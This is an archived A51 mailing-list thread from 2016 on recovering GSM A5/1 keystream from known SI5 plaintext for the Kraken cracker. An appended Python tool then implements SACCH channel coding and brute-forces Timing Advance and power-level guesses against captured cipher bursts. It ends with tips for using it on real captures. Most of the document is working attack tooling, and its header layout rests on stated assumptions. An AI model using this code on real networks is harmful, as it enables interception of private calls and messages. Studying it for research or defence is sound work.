Hi, thank you for the explanation. It seems I still need more time to understand it. Anyway, it will help me for another start. Thanks :)
Regards,
Bass

On Tue, Apr 12, 2016 at 8:29 AM, Вадим Яницкий <[email protected]> wrote:
> 1) I think this guide will help you (a great Sylvain's explanations):
> https://lists.srlabs.de/pipermail/a51/2010-July/000804.html
>
> Some networks broadcast SI packets in a random sequence, and also the
> Ciphering Mode Command is now always sent after a constant count of
> frames. So this method can be useless for you.
>
> You can use the frame number to guess whether this burst is related to
> SI5, SI5ter or SI6. Also, if you use OsmocomBB, try this condition:
> if (burst->flags & BI_FLG_SACCH) { ... }
>
> SI5 is not the only message type you can use to find the keystream. There
> are also SI5ter, SI6 and the "LAPDm U func=UI" packets. The last one is
> more difficult to guess.
>
> 2) I've never used gsmframecoder. All I know is that Timing Advance is not
> the only changing value. There is also MS Power Level, and it can be
> changed (sometimes often) during transmission too. Both of these
> parameters negatively affect the cracking success, i.e. if at least one of
> them is changed, Kraken will find nothing or even give you some false
> positive results.
>
> I think there is a way to solve this problem. We can try to brute-force
> some range of possible values for TA and MS Power Level. This way we
> should prepare a couple of modified SI packets (4 bursts each) using the
> original one. And then we will be able to XOR every supposed encrypted SI
> packet with each prepared plaintext packet.
>
> Best regards,
> Яницкий Вадим.
>
> _______________________________________________
> A51 mailing list
> [email protected]
> https://lists.srlabs.de/cgi-bin/mailman/listinfo/a51
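The brute-force idea in the quoted reply (prepare several SI5 plaintexts differing only in TA and MS Power Level, run each through the channel coder to get 4 bursts, XOR with the captured cipher bursts to get keystream candidates for Kraken), as an added example that is not code from the mailing list, from OsmocomBB or from gsmframecoder. It implements the SACCH coding chain of GSM 05.03 (FIRE block code, rate-1/2 convolutional code, block interleaving over 4 bursts of 114 bits). Assumptions, labelled in the code: the SACCH L1 header layout (octet 1 low 5 bits = ordered MS power level, octet 2 low 7 bits = ordered TA), a constructed 16-octet neighbour-cell description, and a constructed stand-in keystream used only so the example runs offline; on a real capture the cipher bursts come from the sniffer and the BA list from an SI5 seen before the Ciphering Mode Command.

```python
"""Keystream candidates from SI5 plaintext guesses over TA / MS power level.

Added example, not the list's or any project's code. Channel coding follows
GSM 05.03 (control channels); the L1 header layout and sample data are
assumptions, see the comments.
"""
import random
from itertools import product

# FIRE generator g(D) = (D^23 + 1)(D^17 + D^3 + 1) = D^40 + D^26 + D^23 + D^17 + D^3 + 1
FIRE_POLY = (1 << 40) | (1 << 26) | (1 << 23) | (1 << 17) | (1 << 3) | 1
FIRE_ONES = (1 << 40) - 1


def octets_to_bits(octets):
    """MSB-first bit list: d(0) is bit 8 of octet 1, as in GSM 05.03."""
    return [(o >> (7 - i)) & 1 for o in octets for i in range(8)]


def fire_remainder(bits):
    """Remainder of the bit sequence (first bit = highest degree) modulo g(D)."""
    reg = 0
    for b in bits:
        reg = (reg << 1) | b
        if reg & (1 << 40):
            reg ^= FIRE_POLY
    return reg


def fire_encode(data184):
    """184 data bits -> 224 bits. GSM defines the parity so that the whole
    224-bit block divided by g(D) leaves the all-ones remainder."""
    parity = fire_remainder(data184 + [0] * 40) ^ FIRE_ONES
    return data184 + [(parity >> (39 - i)) & 1 for i in range(40)]


def fire_check(block224):
    return fire_remainder(block224) == FIRE_ONES


def conv_encode(u228):
    """Rate-1/2, K=5 code (GSM 05.03 4.1.3): G0 = 1+D^3+D^4, G1 = 1+D+D^3+D^4."""
    u = lambda k: u228[k] if k >= 0 else 0
    out = []
    for k in range(len(u228)):
        out.append(u(k) ^ u(k - 3) ^ u(k - 4))
        out.append(u(k) ^ u(k - 1) ^ u(k - 3) ^ u(k - 4))
    return out


def interleave(c456):
    """Block interleaving of a control channel block onto 4 bursts of 114 bits
    (GSM 05.03 4.1.4): B = k mod 4, j = 2*((49k) mod 57) + ((k mod 8) div 4)."""
    bursts = [[0] * 114 for _ in range(4)]
    for k, bit in enumerate(c456):
        bursts[k % 4][2 * ((49 * k) % 57) + ((k % 8) // 4)] = bit
    return bursts


def encode_cch(octets23):
    """23 octets -> 4 bursts of 114 bits, the form that gets XORed with keystream."""
    return interleave(conv_encode(fire_encode(octets_to_bits(octets23)) + [0, 0, 0, 0]))


def si5_plaintext(ta, pwr, ba_list):
    """23-octet downlink SACCH block carrying SI5.
    Assumed L1 header layout (TS 44.004 7.2): octet 1 low 5 bits = ordered MS
    power level, octet 2 low 7 bits = ordered timing advance. Then LAPDm UI
    header (address 0x03, control 0x03, length 18 -> 0x49), then SI5
    (PD 0x06, message type 0x1d, 16-octet neighbour cell description)."""
    assert 0 <= pwr < 32 and 0 <= ta < 64 and len(ba_list) == 16
    return [pwr & 0x1f, ta & 0x7f, 0x03, 0x03, 0x49, 0x06, 0x1d] + list(ba_list)


def xor_bursts(a, b):
    return [[x ^ y for x, y in zip(ba, bb)] for ba, bb in zip(a, b)]


def keystream_candidates(cipher_bursts, ba_list, ta_values, pwr_values):
    """One keystream candidate (4 x 114 bits) per (TA, power level) guess:
    cipher bursts XOR coded plaintext guess. Only the guess matching what the
    BTS actually sent yields real A5/1 keystream; Kraken has to be run on each."""
    return {(ta, pwr): xor_bursts(cipher_bursts, encode_cch(si5_plaintext(ta, pwr, ba_list)))
            for ta, pwr in product(ta_values, pwr_values)}


def kraken_lines(bursts):
    """114-character 0/1 strings, one per burst, as Kraken's input expects."""
    return ["".join(map(str, b)) for b in bursts]


def demo():
    """Constructed scenario: stand-in keystream (NOT A5/1), constructed BA list,
    BTS sent SI5 with TA=3, power level 5. Returns (hit for (3,5), hit for (4,5))."""
    rng = random.Random(1)
    ks = [[rng.randrange(2) for _ in range(114)] for _ in range(4)]  # stand-in keystream
    ba = [0x10] + [0x00] * 15                                          # constructed BA list
    cipher = xor_bursts(encode_cch(si5_plaintext(3, 5, ba)), ks)       # what a sniffer sees
    cands = keystream_candidates(cipher, ba, range(8), range(8))
    return cands[(3, 5)] == ks, cands[(4, 5)] == ks


if __name__ == "__main__":
    print(demo())
```

Each candidate is a separate Kraken job, so keep the TA and power ranges tight (a few values around those seen in the last unencrypted SACCH); every extra guess multiplies the cracking time and the chance of a false positive on an unrelated candidate.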
